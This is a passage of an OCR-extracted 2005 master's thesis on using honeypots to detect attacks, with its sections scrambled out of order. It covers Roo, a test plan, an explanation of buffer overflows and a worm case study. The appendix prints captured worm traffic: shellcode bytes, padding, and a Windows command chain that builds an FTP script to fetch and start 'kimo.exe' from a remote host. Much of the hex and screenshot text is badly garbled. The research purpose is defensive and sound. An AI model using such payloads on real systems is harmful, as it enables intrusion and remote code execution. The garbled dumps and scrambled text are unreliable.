26. cases this would be sufficient but Honeypot s are dedicated to watch and learn new threats and this requires outbound connections However a production Honeypot with a low level of interaction can be configured with no outbound access The risk involved in this setup can be neglected Thus it appears that different setups involve different risks An implementer has to carefully consider this when planning a configuration A good practice is to deny the Honeypot access to any production device and open communication paths to the public network Additionally the access to the public network needs to be limited Without this limitation the Honeypot could be used to execute e a DoS or a DDoS attack or to store stolen software This requirement can be reached by limiting the number and size of connections to the outside With more advanced techniques such as Intrusion Protection System it is possible to filter individual flows matching predefined patterns This would ban the propagation of worms and separate from advanced attacks 3 6 2 Cloaking the Honeypot The ideal solution would be to tap the monitoring device to a hub between Honeypot and the network and capture all traffic This would hide the presence of the monitor or Honeywall In case of denying outbound traffic from the Honeypot this would be a good solution But this would allow passive monitoring only and lack of controlling Chapter 3 6 1 mentions the importance of a c
27. his or her ability to pursue his interest illegally They are often economically motivated or may be representing a political cause Sometimes however it is pure curiosity Wikip 05 The term Blackhat is derived from old Western movies where outlaws wore black hats and outfits and heroes typically wore white outfits with white hats Whitehats are ethically opposed to the abuse of Computer systems A Whitehat generally concentrates on securing IT Systems whereas a Blackhat would like to break into them Both Blackhats and Whitehats are hackers However both are skilled computer experts in contrast to the so called script kiddies Actually script kiddies could be referred as Blackhats but this would be a compliment to such individuals From the work of real hackers script kiddies extract discovered and published exploits and merge them into a script They do not develop own exploits or discover vulnerabilities Instead they use tools published by the Blackhat community and create random damage A worm is an individual program routine which attempts to self replicate over networks After infection worms often download and install software on the target to get full control That software is often referred as Backdoor or Trojan Horse Worms can propagate via various ways A prepared link on a website can launch the worm routine or an attachment sent in an email can contain malicious code The method of propagation invest
28. learn about the tactics of hackers So far network monitoring techniques use passive devices such as Intrusion Detection Systems IDS IDS analyze network traffic for malicious connections based on patterns Those can be particular words in packet payloads or specific sequences of packets However there is the possibility of false positive alerts due to a pattern mismatch or even worse false negative alerts on actual attacks On a Honeypot every packet is suspicious The reason for this is that in a Honeypot scenario the Honeypot is not registered to any production system Regular production systems should not be aware of the presence of a Honeypot Also the Honeypot should not provide any real production data This ensures that the Honeypot is not connected by trustworthy devices Therefore any device establishing a connection to a Honeypot is either wrong configured or source of an attack This makes it easy to detect attacks on Honeypots see 3 6 5 Page 1 Improving network security with Honeypots 2 Concept architecture and terms of a Honeypot This chapter defines concepts architecture and terms used in the realm of Honeypots It describes the possible types of Honeypots and the intended usage and purpose of each type Further auxiliary terms are explained to gain a deeper understanding about the purpose of Honeypot concepts 2 1 Blackhats and Whitehats In the computer security community a Blackhat is a skilled hacker who uses
29. of hiding its own existence They are easy to fingerprint and easily discovered by advanced Blackhats In addition there is no sensor on the Honeynet operating system This means that traffic is recorded but events on the host are not separately Page 6 Improving network security with Honeypots stored and can be wiped out by the intruder A Honeynet is accessed from the outside by a common layer 3 firewall Gen ll nets are further developed and harder to detect They offer recording on the host s side and even if the connection to the attacker is encrypted they can record keyboard strokes Access is granted by a layer 2 firewall which is hard to detect and fingerprint as it does not even have an IP address Figure 2 2 shows a network diagram of a Honeynet setup with four Honeypots The Honeywall acts in bridge mode network layer 2 OSI 94 which is the same function as performed by switches This connects the Honeynet logically to the production network and allows the Honeynet to be of the same address range External Network Firewall 192 168 10 254 Production PC Production PC Production PC Honeywall 192 168 10 1 192 168 10 2 192 168 10 3 no IP Honeynet 192 168 10 0 24 Honeypot Honeypot Honeypot Honeypot 192 168 10 4 192 168 10 5 192 168 10 6 192 168 10 7 figure 2 2 Honeynet setup Page 7 Improving network security with Honeypots 2 4 Level of interaction In the previous chapters Honeypots were de
30. of time To circumvent this common problem test cases were developed which once successfully completed ensure that errors are discovered before the experiment starts Setup requirements form the basis for these test cases The following chapter will examine the requirements and clarify their necessity The full version of the test cases used during the experiments can be found in the appendix see B 1 All tests can be executed with on board tools This is important for the setup of the Honeypot as third party tools could reveal its true purpose Therefore tests developed in future should concentrate on on board tools to avoid detection The basic tests are using a console and TCP IP based tools such as bash on Linux cmd exe on Windows nslookup is available on both platforms date on Windows is only displaying the date here time needs also to be executed while the Linux pendant of date displays time and date A good requirement states something that is necessary verifiable and attainable This chapter states the requirements and explains each need Verification is done with the test plan found in the appendix Most requirements are easy to attain with on board tools or applications which are installed with the default setup of Roo Requirement R002 is the only which could benefit from a third party tool such as a radio clock Page 35 Improving network security with Honeypots The following requi
31. option would be to use the user administrator or Root whose have system privileges and therefore full access to the operating system Page 46 Improving network security with Honeypots Hackers concentrate on attempts to get system privileges To do this they scan hosts for open ports and try to exploit vulnerabilities Then some code is inserted into the victim s memory which gains system privileges and establishes a connection to the attacker Now the system is under control of the Blackhat and can be used for his purposes 5 2 2 How exploits work To better understand how exploits work the following part will give a description of how buffer overflows work The example bases on program operation and intended memory usage on an Intel x86 processor architecture Goal of an exploit is to execute some code which performs actions to connect back to the attacker and allow remote controlling This code can contain calls to system libraries or code which executes commands at the console in hacker terms that certain type of code is called shellcode General program execution figure 5 5 shows the memory usage of a process in the main memory It is structured in three parts code heap stack The code is stored at lower address ranges It contains processor related directives in binary representation The above area is used by the process heap It is used to store global and dynamic variables In heap based memory
32. protected environment As discussed in 2 6 Honeypots add little value to prevention Therefore the investigation will focus on detecting attacks If this research shows that there are many attacks of choice it would be worthwhile to establish a Honeypot to analyze the motives of the intruders But at the very beginning of this project it seems better to detect and learn about the attacks at FH Darmstadt Response is necessary to stop attacks but right now it is not possible to figure specific responses as we do not know what exactly is happening at the department s network Therefore only standard responses are likely such as improving firewall rules and system policies Page 24 Improving network security with Honeypots 4 2 Evaluation of current solutions The Honeynet Project Honeynet 05 has developed a Linux based solution which boots directly from CD and installs a high interaction Honeypot solution named Roo A global beta test started at the end of March and fortunately Roo could be investigated in this project Further two other solutions seem to be interesting Honeyd a low interaction Honeypot and domino a Distributed IDS solution which monitors dark IP addresses 4 2 1 Roo A Honeynet is a high interaction Honeypot with advanced monitoring and controlling techniques Roo is based on the Honeynet s Gen Il architecture and is freely available on Honeynet 05 The minimum setup consists of two computers one which play
33. recorded evidence of attacks The system can provide information for statistics of monthly happened attacks Attacks performed by employees are even more critical Typically an employee is assigned a network account with several user privileges In many cases networks are closed to the outside but opened to the local network Therefore a person with legal access to the internal network can pose an unidentifiable threat Activities on Honeypots can be used to pRoof if that person has malicious intentions For instance a network folder with faked sensitive documents could be prepared An employee with no bad intentions would not copy the files but in the case the files are retrieved this might reveal him as a mole Another benefit and the most important one is that a Honeypot detects attacks which are not caught by other security systems An IDS needs a database with frequently updated signatures of known attacks What happens if a Blackhat has found an unknown vulnerability Chapter 2 6 gives a more detailed description on how a Honeypot can help detecting attacks Page 5 Improving network security with Honeypots 2 3 3 Research Honeypot A research Honeypot is used in a different scenario A research Honeypot is used to learn about the tactics and techniques of the Blackhat community It is used as a watch post to see how an attacker is working when compromising a system In this case the intruder is allowed to stay and reveal his sec
34. w Transmission Control Protocol inp 20 F 106 10M U FE figure 5 12 screenshot of Ethereal 1 gt Ethereal http www ethereal com Page 55 Improving network security with Honeypots With all tools described above it is very convenient to analyze Honeynet traffic More than that Roo offers the opportunity to do this very quickly However some minor features are still missing Chapter 6 1 discusses some features which would improve the benefit of Roo 5 3 2 Case study Caught worm The data shown in this chapter was extracted from an experiment in June It was chosen to demonstrate that especially alerts of low priority can contain important data The setup was the same as in 4 3 1 Roo_Mue WinXP une 23rd 17 05 44 00 00 04 24 58 107 92 gt 192 168 10 39 CP 4654 O kB 4 pkts gt microsoft ds FIM windows lt O kB 2 pkts ses une 23rd 17 05 53 00 00 03 lt 2 SHELLCODE 86 inc ebx NOOP 84 58 107 92 192 168 10 39 CP 4770 4 kB 10 pkts gt microsoft ds FIN os unkn 0 kB 7 pkts figure 5 13 suspicous flow The first flow is a scan for port 445 This port is listed in IANA 05 as microsoft ds used by Windows XP for sharing network resources via the CIFS Common Internet File System CIFS has been standardized by the Storage Networking Industry Association SNIA 02 and is used by Microsoft operating systems with some changes Unfortunately Microsoft has not released a document with details of its
35. with Honeypots OXFFIC 0x5468697320697320 61206861 726D6C65 737320737472696E 67203A2D2900 This is a harmless string OxFF10 figure 5 6 stack filled with valid variables The figure above shows the stack filled with valid variables The problem is that it is possible to write more than 29 bytes into variable b If the routine does not check the length of the string and discard the 30 and following bytes it will overwrite variable c and the rest of the stack A read on b would give the correct string but a read on c would output parts of b which would be a program error already In the case that the string written into b is even larger than the rest of the stack it starts from top again But now it would overwrite the return address and the basepointer An end of the sub routine would now read the corrupted return address and load the instruction pointer with a corrupted address Usually the program would now fail and result with an error An exploit code is now facing two problems the address of the return instruction is unclear the absolute memory area of the process is unclear Page 50 Improving network security with Honeypots Without the exact size of the stack it is not possible to calculate the amount of bytes needed to exactly overwrite the return code Hence the exploit code contains the new return address multiple times The return address needs to point to a place where the malicious code was in
36. 0 09 09 Ersan ios eh 12 DE OS E9 F7 00 00 098 26 De o AZ 00 OO 00 os Dam es EE 16 04 68 OB DO 2B CA ES E2 98 700 009 82 2 DE Vs bos Es Bio SE 00 200 00 EE 000 Ger FA Oy 02 Ae o ED OG aia ds gO 00 21 DB 66 gt 19 02 03 00 33 PEDO 00 105000 OB wed Lalo ola ae es 18 10 82 CT B LO DA 909 29 2452 21 I 0 30 ARE dee SU 5 30 10107 EE D0 VE GR 46 08 66 ol CA 80 QU SE POPP VE 5H SB EE BO 60 ES 23 00 00 00 6B 44 24 00 PD Se Tl aa aa D aA 16 00 do 30 0538 42 22 99 1 00 09281 8322900 li ee Cate saw EU SER NEE SB 04 22 29 14 52 3200 a od De 64 ar Seel EE 32 64 99 22 31 DE Bo 90 42 9042 St eo BE 02 wade Ls re BiB Keak 89 DE ES AR 772 US 23 EB Eo 8 TE 10264 880238 ercer ya OL ES 00 BE 207 ED NED TE SB de GB 28 De 09 Ud OB ds 2 era Erst TE ES Lada Lo Oi SOU OU 82 7239 33 74 04 SOB DI ea et BB We 189 EA 239 OA 04 74 02 6B 82 04 EB 6 SI IL I ER 8 AA UA GO AS EU OL OL Ca AL 0C EI ED TE GBA ar E LG OB 32 08 82 IE 08 00 08 40 02282 4 WA ES 60 isa Ge A SB 60 22 28 6B 4S 30 OB 04 09 1801 EA SB ZA 18 sTo EsTe Xess s SB DA 20 01 BB oS 38 49 6B 34 9B 01 DE SL Er OL 2 0 8122 CO FC AC 38 EO 74 07 LEE OD OLOT EB Ed SBS nda Ersan ase ai 24 22 TS EL SB 04 24 OL EB 66 gB 0C AB SB 5A IO SU Ze Es Zo Od BS SB 04 GB 01 Eo 890 24 22 UE Ge Ce Des 00 EB adas DS an dal FR 435020 iS 11313 SS 23 43 243122343 A SO 23 da CO COCO COSECOCCOO AD 43 25 da da 135 954345413238 Bo 43
37. 0 kB 9 pkts Mas E Aggregate lt D unknown signature 0 Dune 19th 14 02 43 00 00 01 en el 84 58 35 142 gt 192 168 10 39 TCP 2532 0 kB 3 pkts gt 12045 Filters MR ST windows lt 0 kB 3 pkts q Dune 19th 14 02 45 00 00 02 All Traffic Y a 84 58 52 111 gt 192 168 10 39 TE TCP 4126 0 kB 3 pkts gt 1957 L Bidirectional BA ast Windows lt 0 kB 3 pkts gt Cl From Honeynet June 19th 14 02 49 00 00 00 lt 1 ICMP Destination Unreachable Port Unreachable Pl aii time Periods ol 192 168 10 39 84 58 96 178 O Ej ICMP 0 0 kB O pkts gt 0 Sebek Tracked a os unkn lt 0 kB O pkts June 19th 14 02 49 00 00 00 Anfrage abschicken Ga 192 168 10 39 gt 84 58 96 178 ICMP 0 O kB 1 pkts gt 0 a URP os unkn lt 0 kB O pkts figure 5 11 screenshot of Roo s detailed flow output A click on the disk symbol allows downloading the binary packet dump to a gt protocol reader The best tool for reading the packets is Ethereal it is available for a wide range of operating systems and has excellent filtering capabilities a O ES 3 tftp example pcap Ethereal Ele Edit View Go Capture naize Gtatebcs Halp a Axe Per Ft aaa PHAA DB Filter e a e E Expression Gea Apply info Session Massage Protocol HESS TCR Source Rd 58 af Destination 192 168 Times 000000 10 39 ot 142 230 3 a fi aa iu js Je HO 2 16 J 3 prs gt MIicro
38. 1 AA AAA B 5 Bab EISEOFTES OISE re B 5 B 2 Packet payload example of chapter 5 3 2 uuusnsnsennenneenennennennn B 19 B3 Setup Instruction SA tuviste B 28 B 4 Records of Roo Die and Roo MuUt occocccccccccncccccnnconcnncnncnnonnonnonnos B 34 B 5 Setup description for ROO nasrane nori ae A EAA B 37 List of figures figure 2 1 deployment scenario of a Single HONeypolt occcocncnoccccncnccncncncncnanonas 4 figure 2 2 Honeynet setup 22200 0000200onnnennnnnnnnnnnnennnnnnnnnnnnn nenn nenne nnnn nennen 7 figure 3 1 unprotected environment 2 uu02240022nn0nenne nenne nenne nenne nenne nennen 13 figure 3 2 protected environment 224u0224senennenennenennenenne nenne nenne nenne nennen 14 iguUrS 44 Dro ec Pla ct tvieden viol stcyicivnwdavacbelaiy 23 figure 4 2 setup at IMM A 27 figure 4 3 setup Honeypot M hltal ccoocccocnoocnccocnnocncnanocnconnononanonanoss 28 figure 4 4 layout of VMware installatiOD ooocconnncnnniconccconcnconcnnnncncononcnnnnnns 31 figure 4 5 setup details VMware host FHD coooccccocnccccnccncnccncnncncncnnnnnnnanoss 32 figure 4 6 setup Honeywall FHD ooccooccconconcncconcconnononononoconconononanonanenaness 32 figure 4 7 list Of r00 s COMPONEBNTS cccoccoccccnoncconnononononoconnononononennnnonanenanennnns 33 figure 5 1 example of a test case oocccocccncnoconcconncncnoconenanononnonanonannonnnonanenaness 42 f
39. 3 SAY 63 04 14709 6D 65 Exe n s cdr ime ZE 61 73 70 20 26 63 6D 64 20 2F 63 20 64 65 6C asp amp cnd c del 20 63 64 74 69 6D 65 2E 61 73 70 20 26 73 74 61 cdtime asp amp sta 72 74 20 6B 69 6D 6F 2E 65 78 65 OD OA 00 42 42 rt kimo exe BB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBB
40. 3832 OU lll BO LO 584 33 39 20 3E G3 604 74 69 6D 65 2E 61 13 70 20 26 39 gt cdtime asp 63 GD 64 20 28 163 20 65 63 868 6 20 73 7363 72 md ze echo user ZO EDS 30 72 652 20 67 GE 42 6 61 TD 63 6B 63 64 whOre gotfucked 20 35 55 63 GA 74 69 6D 60 ZE 612 73770 20 28 63 gt gt cdtime asp c 6D 64 20 2F 03 20 63 63 68 16F 20 62 69 OR 61 72 md 7e echo binar 19 20 3E 3E 63 64 14 69 6D 65 2E 61 73 70 20 26 y gt gt cdr 1er ap amp 63 6D 64 20 2E 63 20 65 63 68 OF 20 67 6S 172 20 ema Je echo get 6B 69 6D 6F 2E 65 78 65 20 3E 3E 63 64 74 69 6D kimo exe gt gt cdtim ee 067 28 117535 532158 1 10 DEl MB 322 27 gt MUFACE OIDO o Eypes 080 0 len 0x3C 192 AOS UI a O45 Oe LUZ ad O ee TTE2128 7052020 LD Lo IpLen 20 DgmLen 40 DF RXXARX X X Seq Ox2B47D99A Ack 0x5146226F Win 0x4380 Tcplen 20 _ 4 41 4 4 4 ne ee ee ee ee 06 23 1 7235753166615 0A03C51C013D0376 gt 0 10 04B 504A4 22 Lype 0xs00 len 0x5D6 So LOT EA PO gt LO OO LU ITA ECP TERSLZA TOs 030 EDS IpLen 20 DgmLen 1480 DF Page B 21 Improving network security with Honeypots KRANKFRR Seg 0X5L 26226 AGK OxZB47D99R Win DXECC7 TepLen 20 65 2E GL To 70 20 26 63 6 64 2025 63 20 63 63 e 35P 2cnd FG ec 68 6E 20 62 79 65 20 SE SE 63 64 72 69 6D 65 ZE ho bye gt gt cdtime 61 T gt 70 20 26 63 GD 6420 22 63 20 68 74 70 2E sp Gem a TED 63 T8 69 20 2D 0E 20 2D T
41. 4 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD Page B 25 Improving network security with Honeypots
42. 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Page B 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Improving network security with Honeypots 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
43. AAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA Improving network security with Honeypots 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAY Y AAA 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 41 41 41 41 41 41 41 41 41 41 41 41 03 00 23 82 AAAAAAAAAAAA 0C OF 303 92 04 DA 00 90 22 30 42 90 42 30 42 38 eWeek BBB Ba C4 54 E2 EF FR EC Es 40 0000 00 6B 45 30 85 TC luces PA a Seed OS 78 04 EF 95 AR Lo OB SF 20 0L EB 33328 AO eB lin Sale eles 34 GB OT BE 31 COs 93 AC BAO 72 07 amp T C2 0D 0E Bd ee oo C2 EB F4 3B 54 24 04 75 E3 8B 5E 24 01 EB 66 BB a7 TS Uss Sent OC ARGB Sr IC O1 ER 88 Te CR Ol ER 38 eC 2404 aK june Sas Ss or Co ol CO 204 5220 0 Co CO er CB 40 UC OB FO ots Os Ge IC AD SB 06 9 0B OO 1005 00 85 A0 SA Us ee DI sai es CAs vs 00 00 3 63 SC SF 31 Po 60 9 EB UP 68 Er CECEO A La Miss 60 60 99 EE GA OM 25 7 PE Br R9 ER ER EE EF 03 00 ss cm 64 20 ZF 63 20 65 63 68 OF 20 GF 70 65 6920 32 da 6 echo open 2 30 333 2 ok 33 SZ 348 3928 32 3820 35
44. BBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB Page B 22 Improving network security with Honeypots 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 23 DA 203 08 0008 UE OT DOES OT AS SL DA ear 9 OS 82 02 12 00 43 43 23 43 ZEV EB IE 325 30 37 e aaa EEE 2425 UN 66 81 56 00 00 oor 26 ES ED 00 00 00 EE 3
45. CC Ce Ad Ao da AS AS AS AS 23 43 23 eS AS O AS SSS GEL CCC CC CC CCEE AAS Ae AS AS AS 4S 43 10 AS eo AS eS A Se A CEECEE CCC CCE CCE 4 3 43 45 43 43 43 43 43 23 45 43 45 43 43 43 43 CCCCCCCCCCCCCCCEe Page B 24 Improving network security with Honeypots 45 43 43 43 45 23 82 014 2003 09 00 EB 06 90 90 CCCCCH Se 22454854 90 90 390 90 03 82 04 11 00044 AA 144 44 4442 22 e hoe bs DDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 44 44 44 44 44 4
46. ICMP messages were invoked by executing the Test Cases So none of those were unexpected alerts ICMP messages on Roo_Mue Win2000 show a different behavior Here the Honeypot was compromised by several worms Reading the logs reveals that there is a different behavior between inbound and outbound messages Inbound messages were represented with 11 while outbound messages came to 89 The inbound messages were ping messages to determine the availability of the Honeypot About half of the outbound messages were sent to two different IPs Obviously this was some kind of control host were the worm wanted to connect to The other half is random and at most 4 messages per flow and IP Port 69 is used by the TFTP protocol lt is very interesting that only 0 27 Win2000 resp 0 96 on WinXP caused 26 54 resp 18 15 alerts This is due to the rating of TFTP Get messages Snort rates a TFTP Get with 2 points no matter if this download attempt was successful or not None of the alerts lists a response to the Get messages Cause for this might be a bad or broken worm configuration In early experiments some TFTP downloads were successful so TFTP in general should work Also some tests to determine if TFTP might be unusable in a Scenario IV setup showed that it can work with private addresses So the conclusion to this is a bad Worm design which was not able to propagate properly Luckily this is good in a non Honeypot use Flows on the http port
47. Improving network security with Honeypots Honeypot Project Master s thesis by Christian D ring Referent Prof Dr Heinz Erich Erbs University of Applied Sciences Darmstadt Department of Informatics Koreferent Jim Gast Ph D Assistant Professor University of Wisconsin Platteville Department of Computer Science Eidesstattliche Versicherung Hiermit erkl re ich dass ich die vorliegende Abschlu arbeit selbst ndig und nur mit den angegebenen Hilfsmitteln erstellt habe Darmstadt den 01 Juli 2005 Abstract This document gives an overview on Honeypots and their value to network security It analyzes the requirements for a Honeypot setup and proposes some Test Cases for this purpose Some examples from experiments with Honeypots are explained and analyzed List of Indexes 1 Why do Honeypots improve network security uuu0220000n000an0nn nun 1 2 Concept architecture and terms of a Honeypot uurssnnunennnanennnnnennnnn 2 2 1 Blackhats and Whitehats occooocccoccoocnoconoconccnonocanonanccnnnonanonanonanos 2 2 2 MISION OF MON DO Sasse 3 zar 19P85 01 FIOneVpols ea Ab 3 24 Leverormiteraci n ias id 8 2 5 o CKS icssicesacesdacrsessivavseerasenseansyarausrdsencesnivasauarducsaesnieaswwesiaaniees 9 2 6 SECUNIY Cae a Ra 10 Zeb NU A 11 3 Honeypots in the field of application uuuuunnenennnnnnnnnnnennnnnenn anne 13 3 1 Scenario unprotected environment
